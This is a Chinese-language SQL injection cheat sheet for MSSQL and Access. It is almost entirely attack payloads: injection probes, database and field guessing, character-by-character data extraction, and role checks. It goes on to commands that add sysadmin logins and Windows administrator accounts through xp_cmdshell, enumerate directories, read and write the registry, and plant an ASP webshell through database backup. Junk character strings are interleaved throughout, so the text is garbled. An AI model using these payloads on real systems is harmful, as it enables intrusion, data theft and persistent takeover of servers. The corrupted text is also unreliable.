1.判断是否有注入;and 1=1 ;and 1=2 nxt1Y04,H
2.初步判断是否是mssql ;and user>0 %(E6ADB
ZFzOW
3.注入参数是字符'and [查询条件] and ''=' 'e*C^(6
!qR(Rn
4.搜索时没过滤参数的'and [查询条件] and '%25'=' rT#QA=YB
m0 P5a%D
5.判断数据库系统 $Z j.
"$)2|
;and (select count(*) from sysobjects)>0 mssql =Yfs=+O
Gd"*mLd
;and (select count(*) from msysobjects)>0 access W%P&o}'
g41LpplX
*+IUGR
ZoUfQ!2*
6.猜数据库 ;and (select Count(*) from [数据库名])>0 5E@V@kw
itP_Vxo/H
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 >Cf`F{X'U
T \A uL
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 84{<]y
\!PC:+uJ
9.(1)猜字段的ascii值(access) +)|2$$m
OjCT%6hy;
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 *0U(nCT&m
ReRRFkO"2
(2)猜字段的ascii值(mssql) ]X5*e'
YGHWO#!Gp
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 'G^=>=w|Nv
<7p2OPD
10.测试权限结构(mssql) 0Zq"-
NE! Xt <A
^v},Sa/ot]
&F:7U!
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- enNn*.*|
fSTEZH
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- d/^^8XUK
=19]a
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- r*g _
@@5u{K
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ~vXul`x
#?/.LMn{
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- lA1R$
JDP#tA3
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- yT>T
Vq/e
6R<%.-qr
;and 1=(select IS_MEMBER('db_owner'));-- *rbayH
& #|vGhA
t
_W |`
ge`J>2
11.添加mssql和系统的帐户 <omz9d1
X6;aF;"5
;exec master.dbo.sp_addlogin username;-- 6y0C
;exec master.dbo.sp_password null,username,password;-- eDm,8Se
VjnSi
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- qdm!]w.G5
qq/Cn4fN8
;exec master.dbo.xp_cmdshell 'net user username password MqpoS
4>|5B:
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- $~-j-0
\m
Qw^tzP8
;exec master.dbo.xp_cmdshell 'net user username password /add';-- I2 Kb.`'!
-(2-zznZ
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- M]2 c-
[
~E}x
LY>JE6zTt
D3Mce|t^
12.(1)遍历目录 fx|9*|E
iaC$K@a{
;create table dirs(paths varchar(100), id int)
~)Z`Q
,t[D1KZt
;insert dirs exec master.dbo.xp_dirtree 'c:\' }_;nln?t(
^J G}|v3$
;and (select top 1 paths from dirs)>0 ?BRL;( x
I|M*yObl6
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) v:>P;\]r9M
7-LeJRB
p<jr&zVEc>
LiRY-;8=
(2)遍历目录 MnQ_]cC
%(]rc%ry0
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ,..b)H5n
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 E%e-R6gl
0jmlsC>
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 |j+~Td3})&
M~6I-HexT|
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 dO@iq^9-
L_~G`Rb3
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 x:x QXjJ
h(L5MZs
1K`A.J:Uy
-FI1$
13.mssql中的存储过程 Yem\`; *
(07d0 <<[
xp_regenumvalues 注册表根键, 子键 *O;N"jf
V6k9L*VP
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ?Y9?x,x
ZKvh]
xp_regread 根键,子键,键值名 )N/KQ[W
liTr3T`,V
;exec xp_regread E;sltl
!8g
y)2
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?]z
._I`E
,&-[$,
xp_regwrite 根键,子键, 值名, 值类型, 值 5f5ZfK3<i
R4/@dA0
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ($s{em4L
$W]bw#NH
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 z-DpLV
DkIFvsLK
xp_regdeletevalue 根键,子键,值名 xpM~*Gpm
| QA8"&r
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ,3j7Y5v
Ce:ds%
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 bhmjH(.t
C#Jj;Gd
hd~rC*I
UwU]l17~
14.mssql的backup创建webshell zMKL: Um"
je-s%kNlJ
use model l&B'.6XKs
bRp[N
create table cmd(str image); 9x!y.gx
v knFtpx
insert into cmd(str) values (''); $b} +5
B}X#oA
backup database model to disk='c:\l.asp'; /`> P|J
`t6L'%\
]Ho`*$dD
=HHg:"
15.mssql内置函数 Mk[`HEO
SO/]d70HG
;and (select @@version)>0 获得Windows的版本号 R`q!~8u
*q{UipZbx
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 3;:V1_JA
-e>)yM `i
;and (select user_name())>0 爆当前系统的连接用户 0
,-b %X
Y=Qf!Cq]
;and (select db_name())>0 得到当前连接的数据库 ?M^t4nj
N/BU%c
ph+
9 NQq=@
n~j[Pw
16.简洁的webshell _+iz?|U
`x)bw
use model Q%^bA,$&D
/MH@>C
_
create table cmd(str image); %<yM=1~>
VsEAo
insert into cmd(str) values (''); bl_WN|SQ
L0tKIpk
backup database model to disk='g:\wwwtest\l.asp';